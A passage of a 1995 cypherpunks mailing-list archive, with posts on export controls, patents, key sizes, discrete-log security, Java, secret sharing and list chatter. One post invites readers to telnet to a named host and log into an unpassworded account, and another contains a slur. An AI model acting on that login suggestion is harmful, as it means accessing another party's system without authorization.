are defending our privacy with cryptography, with anonymous mail
forwarding systems, with digital signatures, and with electronic
money.

Cypherpunks write code.  We know that someone has to write software
to defend privacy, and since we can't get privacy unless we all do,
we're going to write it. We publish our code so that our fellow
Cypherpunks may practice and play with it. Our code is free for all
to use, worldwide.  We don't much care if you don't approve of the
software we write.  We know that software can't be destroyed and that
a widely dispersed system can't be shut down. 

Cypherpunks deplore regulations on cryptography, for encryption is
fundamentally a private act.  The act of encryption, in fact, removes
information from the public realm.  Even laws against cryptography
reach only so far as a nation's border and the arm of its violence.
Cryptography will ineluctably spread over the whole globe, and with
it the anonymous transactions systems that it makes possible. 

For privacy to be widespread it must be part of a social contract.
People must come and together deploy these systems for the common
good.  Privacy only extends so far as the cooperation of one's
fellows in society.  We the Cypherpunks seek your questions and your
concerns and hope we may engage you so that we do not deceive
ourselves.  We will not, however, be moved out of our course because
some may disagree with our goals.

The Cypherpunks are actively engaged in making the networks safer for
privacy.  Let us proceed together apace.

Onward.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:45:05 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
Message-ID: <199511131617.IAA28486@well.com>
MIME-Version: 1.0
Content-Type: text/plain


>     Anonymous remailer and PGP
>     Unusual applications
>
>I dont know if anyone else caught it last year
>but High Times discovered anonymous remailers
>and PGP for an article last year for
>anonymous remote control of grow rooms.
>

Actually, the NYT Magazine did a cover story on pot growing within the last
year, and toward the end one of the Americans doing grow rooms in Holland
said specifically that he was looking toward anonymous electronic
communications as a way to control his grow rooms remotely and securely.

Lee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:29:00 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511131617.IAA28561@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I realize I'm a little late in this thread, but I'm pretty far behind in my
e-mail.  I oversimplify here, but what's new.

Anyway, all I wanted to say is that treaties are *not* superior to acts of
Congress, as far as I know (they do override state law).  I'm not an
international lawyer, but it was held long ago that a properly ratified
treaty is "equivalent to an act of the legislature."  Foster v. Neilson, 27
U.S. (2 Pet.) 253, 314 (1829) (Marshall, C.J.).  Note also that a treaty is
not necessarily self-executing; if it requires appropriation of funds,
Congress needs to act again.  Whether Congress may decline to implement is
unclear.  

Finally, the Supreme Court has also held that when there is conflict
between an Act of Congress and a treaty, "the last expression of the
sovereign will must control."  The Chinese Exclusion Case, 130 U.S. 581
(1889).  

Treaties may still bind the U.S. internationally, putting the U.S. in
default.  But a U.S. person would not be able to enforce any treaty-based
claim if a later U.S. law conflicts, at least in a U.S. court.  

Lee

P.S.  I'm not aware of telecom treaties that would shield one from ITAR
violations, but would be interested to know of any.  I generally refrain
from public comment on ITAR because we are in litigation, as most of you
know.

Perry wrote:

>"Peter D. Junger" writes:
>> : I understand that you are a lawyer and I'm not, but it is my
>> : understanding that international treaties come in to play on this sort
>> : of thing. For instance, in international shipments, you can transship
>> : items and substances that are illegal to possess in a country through
>> : its ports provided that the materials do not originate or terminate
>> : their shipment in the country and remain sealed in their containers
>> : throughout. It is also my understanding that items like mail and phone
>> : calls that happen to transit a country are not necessarily subject to
>> : that nations laws provided that the nation is not a terminal point for
>> : the mail or call or what have you.
>> 
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.
>
>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superceeded by lower
>level laws, in spite of the supremecy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.
>
>Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Mon, 13 Nov 1995 23:49:41 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: RE: POTP Security
Message-ID: <30A78DA4@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



> From: Paul Jackman <jacktech@delphi.com>
>Newgroups: talk.politics.crypto
> Subject: Re: Elementrix One-Time Pad
>..
> The algorithm will be published when patent protection is assured.
> It is currently patent pending in several countries.

I saw that comment earlier.  It's rather a curious statement, given that the
rule of publication vs. patents is that publication before FILING kills
your ability to get the patent (in most countries) whereas publication
after filing but before grant is not an issue at all.  This explains why
you often see a mad scramble in companies when something
patentable is about to be announced at a trade show, or explained
in a white paper... the filing has to be in the mail before that happens.
But only just before... whether the patent office takes days or years
to grant the patent doesn't matter.

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 13 Nov 1995 20:09:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Market Value of Web Pages
In-Reply-To: <acc7f59c06021004e10b@[205.199.118.202]>
Message-ID: <199511130035.AA32505@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>If you toss arguements like this at some of the sites that would be viable for
>>the hit numbers and then explain the only way that will occur is if the crypto
>>laws are repealed, you will create a lot more lobbiers annoying their reps
>>for the cause. ecash without good crypto is like the Federal Reserve
>>deliverying cash with open pickup trucks. Or doing credit card purchases on
>>postcards.
>
>And if you make arguments that this is easy to do, and add that crypto laws
>are stopping this from happening, you risk losing your credibility.
>
>The current crypto export laws are a pain, but are not stopping these
>"million hits a day" transactions. Recall that the 40 bits allowed in
>Netscape for export took some non-trivial number of machine-hours to crack
>(I'm talking about the brute force crack by Damien G. and others, not the
>more recent exploitation of the RNG weakness). While this brute force crack
>showed the limitations of the 40-bit key for certain transactions, it is
>not a viable attack on a single transaction whose value is pennies.

My point was (and I failed to mention it :) that to protect against stolen
funds you need to encrypt the transactions using strong crypto. Amongst US
juridictions this is possible so long as you license the technologies... so
be it. The achilles heel for global secure business from the US is the ITAR
limitations. This weakens the crypto to levels that are breachable by quite
a lot of people.  As machines get faster and the ITAR laws keep the MTTB
(Mean Time To Break) down it will become more and more efficient to collect
and exploit electronic cash or credit cards.

In other words, if you want to run a trusted global electronic cash based
business then you need strong crypto otherwise someone will break your
transfers and therefore reputation and noone will want to do business with
you over the inet. At the very least it will cost you PR $ to curb any
damage done. Just ask Netscape.

You can live fine with the 250 million people in the US buying your product,
but with 5 billion potential users out there globally, (with various degrees
of connectivity), it makes sense to enable them to buy from you too.

Off topic:
Personally I dont see the relevance of ITAR and crypto any more. When was the
last time any one was prosecuted under its statutes? What is the point of
banning exportation of software which is widely available outside the US
anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not
going to balk at using any method that can, irrespective of its legality
in the eyes of the US. With their resources they can construct secure OTP
systems by sending in people with a couple of "music CDs" in their briefcase.

Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 14 Nov 1995 00:19:42 +0800
To: daw@cs.berkeley.edu
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511130525.VAA21438@comsec.com>
Message-ID: <9511131548.AA24703@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: David A Wagner <daw@CS.Berkeley.EDU>
>Date: Sun, 12 Nov 1995 14:43:53 -0800 (PST)


>``Hence the fields GF(2^n) out to be avoided in all cryptographic
>applications.''

I wonder what this implies about elliptic curve applications over
GF(2^n)...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 14 Nov 1995 00:22:28 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <9511131552.AA04995@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>1)  What is the key size used by the USA licensed version?

Charlie Kaufmann goes into moderate detail on Lotus Note's 
encryption scheme in "Network Security: Private communication
in an public world"

Each user has both strong (~512 bit)  and weak (~400 bit)  RSA keys. 
These, and strong (64 bit) or weak (40 bit) symmetrical session keys 
are used depending on the  location of the users.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 14 Nov 1995 01:51:05 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <199511092241.OAA14102@jobe.shell.portal.com>
Message-ID: <199511131603.LAA21075@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Mon, 6 Nov 1995, Ray Cromwell wrote:
> 
> > > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > > 
> > > >From the Java Web pages (as combined in Firewalls/BoS):
> > > 
> > > > The language's security features (not just applets):
> > 
> > [Long list of bullshit deleted]
> 
> I don't think that this is *bullshit* ... the questions I mean ... but,
> I for one am tired of people promoting products in a manner which flies 
> in direct contravention of expert consensus.

   Dr Cohen could have answered the questions himself if he had read
the literature. What he did was equivalent to asking "how secure is DES"
based on a marketing information flyer. Java does not fly in direct
contravention of expert consensus. Java does not purport to solve
the halting problem or formally prove the correctness of algorithms.
The only phrase you can quibble with is "tamper-free/virus-free",
but how many products on the market make that claim, for instance,
over-the-counter drugs? Anyone with half a brain knows that nothing
is perfectly secure, and what those phrases really mean is
"tamper-resistant". So get over it.

  It seems that after all those Netscape bugs were found, now folks,
many of whom I consider to not be very skilled in computer science,
are trying to conduct a witch hunt against Netscape, it seems in the
hope of gaining some fame or recognition. The general tone of your
messages and Dr Cohen's, leads me to believe that you think you are
conducting some service by "exposing" these "flaws", thinking that
one day c'punks will recognize your contribution and thank you. 
My guess is that most c'punks view your analysis as content free,
and overly zealous/hostile.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 13 Nov 1995 12:33:10 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail 2.20
In-Reply-To: <199511090804.CAA20494@ion1.ionet.net>
Message-ID: <Pine.LNX.3.91.951113115956.13040D-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Scott Staedeli wrote:

[David Harris:]
[...]
> will define an open interface for third-party encryptors and it is then
> up to other people to write the code. What I envisage actually happening
> is people writing "shell interfaces" for WinPMail - i.e., modules that
> take the calls I make and translate them into calls to other programs,
> such as PGP or whatever, returning the result.

Is anybody currently writing modules for PGP (or, less trivially, for
MOSS, S/MIME etc.)? I've had a look at the interface and it doesn't seem
difficult, but why re-invent the wheel? :-)
The real question for PGP, actually, is which scheme should be supported
to achieve MIME compatibility among the several proposed in the IETF
drafts. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Tue, 14 Nov 1995 02:16:10 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
In-Reply-To: <199511131617.IAA28486@well.com>
Message-ID: <199511131737.MAA17729@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 13,  9:21, Lee Tien sent the following to the NSA's mail archives:
> Subject: Re: The Crypto Applications we would rather not talk about
|| 
|| Actually, the NYT Magazine did a cover story on pot growing within the last
|| year, and toward the end one of the Americans doing grow rooms in Holland
|| said specifically that he was looking toward anonymous electronic
|| communications as a way to control his grow rooms remotely and securely.
|| 

If the story were about how pot growers used locks on their doors to
keep people out, I doubt very many people would care.  The mere fact
that a computer is involved in some way turns on the hype buttons of many
journalists who would otherwise find the story unremarkable.

	David

-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 14 Nov 1995 05:26:24 +0800
To: David A Wagner <cypherpunks@toad.com
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951113123310.24760A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote earlier:

> Thanks for the reference.  The paper gives a running time of exp(c(n 
> log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
> for discrete log in GF(2^n).  However, this paper was published in 1985. 
> There is now an algorithm to calculate discrete logs in GF(p) in
> exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
> directory), so perhaps GF(2^n) isn't so bad after all. 

To clarify my earlier post, although both of the latter two algorithms
have a runtime of the form exp(c*n^(1/3)*(log n)^(2/3)), for GF(p)
c=1.922+o(1), for GF(2^n) c=1.405+o(1).  This seems to imply that if 
GF(2^n) is to be used, n needs to be 2.56*log p to achieve a comparable 
level of security to using GF(p).  (2.56=1.922^3/1.405^3)

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 04:21:41 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto - Proactive security plug
Message-ID: <acccdebc040210049a7f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 11/13/95, Amir Herzberg wrote:
>A small note/plug: the schemes by Tim and Michael are based on `long lived'
>secret sharing, i.e. you trust each share of your secret to a server for a
>really long time. Some people may be concerned that such a long time would
>allow an attacker to break into most servers and reconstruct the secret (key).
>
>A solution to this is proactive secret sharing, as described in [HJKY95].
>In this protocol, the secret shares are periodically refreshed (i.e. new
>shares are computed distributively and then the old shares are erased).
>In this manner, an attacker has to break into most servers during the same
>period; shares from one period are worthless on the next period.
>
>Best, Amir
>
>[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
>M. Yung, Crypto 95.

I also was sent a copy of Ron Rivest's latest paper on timed-release crypto
(also available at the URL http://theory.lcs.mit.edu/~rivest/).

These noted cryptographers, Amir, Ron, and others, are of course doing
"real cryptography" on this timed-released stuff....my speculations in '93
and later are informal, rough considerations. There are dangers in using
"common sense" in protocols like this, but, then, few of us have the time
to explore things in enough detail.

I just wanted to clarify things, though I suspect most of you know that
many of my arguments (and those of others, too) are based on informal, bull
session, sorts of foundations. This is often enough at a very early stage.
No substitute for much more rigorous, published-paper-quality analyses, of
course.

>> --Tim May
>>
>> Views here are not the views of my Internet Service Provider or Government.
>
>How do you know that?   :-)

In the past, I have actually gotten warning letters from some of my
Internet Service Providers saying that my views were inimical to their own
views. One provider, who shall remain nameless, actually *turned off* my
access to NetNews until I agreed to post a clarification that the views I
was expressing were not his views!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 14 Nov 1995 05:57:26 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <30A78DA4@mailer2>
Message-ID: <30A7B5A1.59C7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Koning 1695 wrote:
> 
> > From: Paul Jackman <jacktech@delphi.com>
> >Newgroups: talk.politics.crypto
> > Subject: Re: Elementrix One-Time Pad
> >..
> > The algorithm will be published when patent protection is assured.
> > It is currently patent pending in several countries.
> 
> I saw that comment earlier.  It's rather a curious statement, given that the
> rule of publication vs. patents is that publication before FILING kills
> your ability to get the patent (in most countries) whereas publication
> after filing but before grant is not an issue at all.  This explains why
> you often see a mad scramble in companies when something
> patentable is about to be announced at a trade show, or explained
> in a white paper... the filing has to be in the mail before that happens.
> But only just before... whether the patent office takes days or years
> to grant the patent doesn't matter.

  I would guess that they are choosing to be cautious so that if their
patent is rejected they can still maintain it as a trade secret.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 14 Nov 1995 03:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe all news groups
In-Reply-To: <199511131855.UAA00152@grumble.grondar.za>
Message-ID: <9511131928.AA21826@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Mary Rose wrote:
 > > I wish to unsuscribe ...
 > 
 > Please send a one line message ...


Hmm...  I was going to suggest asking Yvette.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Tue, 14 Nov 1995 03:12:17 +0800
To: cypherpunks@toad.com
Subject: New feature for the Cryptography Technical Report Server
Message-ID: <199511131840.NAA21640@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it's still there!  8-)  I posted a note to this list a few months ago
announcing that I had set up such a service, and though we've only got a 
few reports I'm up to a couple o' hundred visitors a week.  To me, the amount
of activity indicates interest in the subject, but the lack of reports
tells me that either authors are not interested in contributing, it's 
too difficult to contribute, or they don't know about service.  

I took some time this weekend and wrote a script to handle online submissions.
This should make things easier on the authors, I think.  If you have
a technical report, journal article or book you'd like to index in CTRS
(abstract only submissions are supported as well as full-text submission),
point your browser at:

	http://www.itribe.net/CTRS/add-entry.cgi

If you try this, please let me know how you liked it.  I'm interested in 
making the submissions process as painless as possible.  

As always, the main CTRS page is

	http://www.itribe.net/CTRS/
		or
	https://www.itribe.net/CTRS/



-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 05:07:15 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: "Not the views of my government"
Message-ID: <accce9d900021004d7ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:16 PM 11/13/95, Brian Davis wrote:

>And, being personally familiar on the Government's position on many of
>the issues discussed here, I can certify that many/most/all of Tim's
>views are not the views of the United States government!


Indeed. Though many would argue that some (large) fraction of the views I
and others express are right in line with the views of the Founders.

Certainly Jefferson, Franklin, Henry, and others would be aghast at the
modern interpretations of the Constitution.

"What do you mean my inn may not allow smoking? Surely it is up to
customers to freely choose to enter my inn or not enter my inn."

"What do you mean I must hire fixed quotas of various ethnic and racial
groups, no matter my preferences?"

"How can the government command me to pay more for a worker than I wish to
freely pay?"

"Why are these things you call helicopters flying over my farm at all
hours? if they are looking for "illegal crops," why is this their concern?
Why do they subsidize tobacco production? Why is government paying farmers
to grow some crops and not to grow other crops?"

"What, pray tell, is this "key escrow" business? Do we no longer have
protections against unlawful search? Are our papers and conversations now
to be "escrowed" with the King's men? What country have I been brought back
into?"

"I am just an ignorant Founder; I know not the ways of your strange land."


--Timothy Jefferson May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Amir Herzberg <amir@watson.ibm.com>
Date: Tue, 14 Nov 1995 03:32:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <v02120d01acc4eb3a6eb1@[199.0.65.105]>
Message-ID: <9511131904.AA21605@gimili.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



A small note/plug: the schemes by Tim and Michael are based on `long lived'
secret sharing, i.e. you trust each share of your secret to a server for a
really long time. Some people may be concerned that such a long time would
allow an attacker to break into most servers and reconstruct the secret (key).

A solution to this is proactive secret sharing, as described in [HJKY95].
In this protocol, the secret shares are periodically refreshed (i.e. new
shares are computed distributively and then the old shares are erased).
In this manner, an attacker has to break into most servers during the same
period; shares from one period are worthless on the next period.

Best, Amir

[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
M. Yung, Crypto 95.

> At 12:09 AM 11/7/95, Michael Shields wrote:
>
> >In the May proposal, when you have a message to be encrypted, you
> >encrypt it with a session key, optionally split that key with an n-of-m
> >scheme, and then send the key into a network of escrow agents, which are
> >instructed to hold the message for a given period of time.  You then
> >hold onto the encrypted message, though you need not keep it secret.
> >Conceptually, you have encrypted a message and then remailed the key to
> >yourself in such a way that it will take X length of time to arrive.
>

> --Tim May
>
> Views here are not the views of my Internet Service Provider or Government.

How do you know that?   :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Tue, 14 Nov 1995 07:23:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <9511132213.AA19022@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


Today's New York Times has a nice article in the business section
about credit card security on the Internet. It's more of an editorial
than an article, but it's an editorial with the (IMNSHO) right spin:
shipping a credit card number over the Internet, even unencrypted, is
no less secure than giving it out over the phone.

The NYT has been doing a nice job covering computer issues in the past
few months, in the Monday's business section. Worth reading if you
want to keep an eye on intelligent media coverage of the net.
-- 
                                __                      
nelson@santafe.edu              \/              http://www.santafe.edu/~nelson/
PGP key 9D719FAD   Fingerprint 3B 9B 8E 58 1C 90 57 3E  B7 99 ED 13 65 2E 0B 24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 14 Nov 1995 04:52:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <acccdebc040210049a7f@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.951113151455.7281B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Nov 1995, Timothy C. May wrote:

> At 7:03 PM 11/13/95, Amir Herzberg wrote:
>  ... 
> >> --Tim May
> >>
> >> Views here are not the views of my Internet Service Provider or Government.
> >
> >How do you know that?   :-)
> 
> In the past, I have actually gotten warning letters from some of my
> Internet Service Providers saying that my views were inimical to their own
> views. One provider, who shall remain nameless, actually *turned off* my
> access to NetNews until I agreed to post a clarification that the views I
> was expressing were not his views!
> 
And, being personally familiar on the Government's position on many of 
the issues discussed here, I can certify that many/most/all of Tim's 
views are not the views of the United States government!

EBD

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 14 Nov 1995 06:12:04 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Tenticle: Yvette and unsuscribe all news groups
In-Reply-To: <9511131928.AA21826@alpha>
Message-ID: <9511132140.AA22158@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Mary Rose wrote:
>  > > I wish to unsuscribe ...
>  > 
>  > Please send a one line message ...
> 
> 
> Hmm...  I was going to suggest asking Yvette.
> 

Hmm.. the tenticle has been sending my death threats; this
tenticle has a difficult time spelling "killed" correctly.

Instructions for creating your own tenticle:

telnet to vabeach.email.net and try to log into the unpassworded
account 'mm'.  This was obviously a BBS to increase the sysops
chances for landing a human date.  Hmmmm...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Tue, 14 Nov 1995 05:31:38 +0800
To: amir@watson.ibm.com (Amir Herzberg)
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <9511131904.AA21605@gimili.watson.ibm.com>
Message-ID: <199511132053.PAA01851@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


[...]

> A solution to this is proactive secret sharing, as described in [HJKY95].
> In this protocol, the secret shares are periodically refreshed (i.e. new
> shares are computed distributively and then the old shares are erased).
> In this manner, an attacker has to break into most servers during the same
> period; shares from one period are worthless on the next period.
> 
> Best, Amir
> 
> [HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
> M. Yung, Crypto 95.

[...]

Here is an example of _dynamics_ being used to increase the security of
a logical protocol.  I believe that dynamics may be usable at a more micro
level to build a physical device that is expensive to compromise...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 14 Nov 1995 05:36:40 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe all news groups [NOISE]
Message-ID: <199511132103.QAA30498@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Someone wrote:

>
>I wish to unsuscribe to all news groups as I feel I should be on a different >planet.

The planet of the clues.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKex/m1lp8bpvW01AQEvdAQAqjSV16hsO3mvGF71I1UkD9Ti/scw5slg
yd51BAttoIb7qDMox7W6ofBAaRW9YrJuD2hoU+/FGJMecEDgsjGnZgcPO2joh4AF
zJD4RU3a2VnEHzKRL+n9xQEtzn6Swo+rnDpRmJKtWso9jpUNXkasl9VTvVRzhf78
hweN2FR/nN4=
=4bJ9
-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Tue, 14 Nov 1995 09:32:48 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Admissions Test [NOISE]
Message-ID: <199511140034.QAA05792@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Simply pick the BEST answer to EACH question.  Scoring information is
> provided at the end of the test.

[ Snip ]

> 14)  Blowfish is:
> 
> 	a)  Bruce Schneier's new Feistel network symmetric encryption
> 	    algorithm.
> 	b)  a possible replacement for DES.
> 	c)  something I ran into in the PGPfone docs.
> 	d)  a good way to get food poisoning at a sushi bar.

e)  Your favorite mail order catalog.  See http://www.blowfish.com/

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 14 Nov 1995 06:47:52 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Hakim Bey mention of gvm't crypto policy
Message-ID: <Pine.SUN.3.91.951113164643.9263A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is a very brief excerpt from a Hakim Bey piece available at 
http://www.t0.or.at/hakimbey/boundary.htm, dealing with... well... lots 
of stuff, actually. Including stuff talked about on the list. I recommend 
the entire piece highly.

Jon

             --------------------------------------------

Knowledge itself can be seen as a kind of virus. On the psychological
level this perception manifested recently as a panic about "computer
viruses", and more generally about computer hacking -- boundary violations
in cyberspace, so to speak. The government wants access to all computer
cypher-codes in order to control the "Net", the InterNet, which might
otherwise spread everywhere, transmitting secrets, even secrets about
"abuse" and kiddy porn -- as if the Net were a disease, rather than simply
a free exchange of information. America's immune system can't take "too
much knowing" (or whatever T.S. Eliot's lame-ass phrase was); America must
be "protected" from penetration by foreign chaos cabals of evil hackers
(who might look just like you and me) -- borders must be imposed. 

            ----------------------------------------------

------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
